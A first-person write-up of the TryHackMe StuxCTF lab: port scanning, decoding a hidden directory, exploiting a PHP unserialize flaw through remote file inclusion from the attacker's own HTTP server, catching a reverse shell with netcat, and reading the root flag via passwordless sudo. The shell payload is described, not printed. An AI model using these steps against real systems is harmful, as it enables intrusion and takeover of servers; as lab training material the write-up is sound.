Hello. I’m Rahmos. Here is my StuxCTF — TryHackMe — WriteUp. Check it out!
First, deploy the machine and nmap for opened ports:
nmap -A -T4 -p- -v <ip>
So there are 2 ports opened: 22(SSH), and 80(HTTP). First, let’s access the website.
Time to check the page source (Ctrl + U):
Well I’ve found a hidden dir, but encoded. I need to find the format to decode it. Look at the hint:
Ok here is the format. Let’s write a simple script to calculate that. You can find my script here. Running the script gave me the result:
Copy everything and access via browser:
Again, view the page source:
I have the “hint”: /?file=. I’ve tried append it with /etc/passwd and other possible files’ names but it didn’t work. So I tried to look at the default page itself: /?file=index.php
It gave me a very long string. Let’s try decode it. I will use this link.
First decode it from hex, it gave me the reverse base64 decode string. So let’s reverse this string and decode again from base64:
Well looks like it’s the source code of index.php. First, it will check the file name input from /?file=, if it’s index.php, it will encode the index.php to the string I’ve seen above and print out. But if the input file name is everything else but not index.php, it will print “File no Exist!”. However, look at the “unserialize” line, it’s a vuln of this php code. It will deserialize any files uploaded to the server. Here’s the link to learn more about the vuln of PHP serialization.
Now I’ll write a simple PHP code to exploit this vuln.
The white box will be your VPN ip. This php code will exec the command to spawn a reverse shell to my machine. In order to let it exec on the website, I have to serialize this file. So here’s my php code after serialized:
Now I will upload this “testshell.txt” file to the website via ?/file=
Start a http server on your machine:
python3 -m http.server 9000
or if you use python2:
python2 SimpleHTTPServer 9000
Then access the browser, append /?file=http://<your-VPN-ip>:9000/testshell.txt
As you can see, the “testshell.txt” has been uploaded. Because the website will deserialize all the file in the server, so it also deserializes my “testshell.txt” to “myshell.php”.
Start a listener on your machine:
nc -lvnp 4444
Then append /myshell.php to the url and access, I’ve got the reverse shell into the target!
Spawn a tty shell for stability:
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
Then move around to get the 1st user.txt:
Now I’ll find a way to own root and get the final flag. First, sudo -l to check sudo right on this machine:
Well that’s easy! I can run any commands as sudo without password. Get the final flag:
sudo cat /root/root.txt